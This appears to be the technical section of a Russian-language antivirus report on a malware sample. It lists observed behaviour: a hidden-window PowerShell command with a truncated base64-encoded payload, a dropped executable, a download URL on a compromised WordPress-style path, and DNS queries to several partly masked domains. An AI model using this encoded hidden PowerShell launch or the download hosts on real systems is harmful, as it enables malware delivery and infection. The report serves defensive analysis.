Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABXAHoAcAB0AGUAcABvAG4AcgA9ACcAQQB6AHIAaABsAHkAbQBwAHMAJwA7ACQAUgBvAGgAdgBtAHoAbgBxAHAAbAAgAD0AIAAnADEANgAwACcAOwAkAEIAaAByAHgAbwBpAGQAZABpAHUAYwA9ACcAWgBrAGsAaABwAGQAdQBzACcAOwA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1980
- %TEMP%\851718.cvr
- %HOMEPATH%\160.exe
- %HOMEPATH%\160.exe
- 'sa####patil.online':80
- http://sa####patil.online/wp-includes/rBhbqf/
- DNS ASK sa####patil.online
- DNS ASK de###.#utostar.com.sa
- DNS ASK ac#####emagicsjacks.xyz
- DNS ASK he###ghao.club
- DNS ASK re###at.club
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABXAHoAcAB0AGUAcABvAG4AcgA9ACcAQQB6AHIAaABsAHkAbQBwAHMAJwA7ACQAUgBvAGgAdgBtAHoAbgBxAHAAbAAgAD0AIAAnADEANgAwACcAOwAkAEIAaAByAHgAbwBpAGQAZABpAHUAYwA9ACcAWgBrAGsAaABwAGQAdQBzACcAOwA...' (со скрытым окном)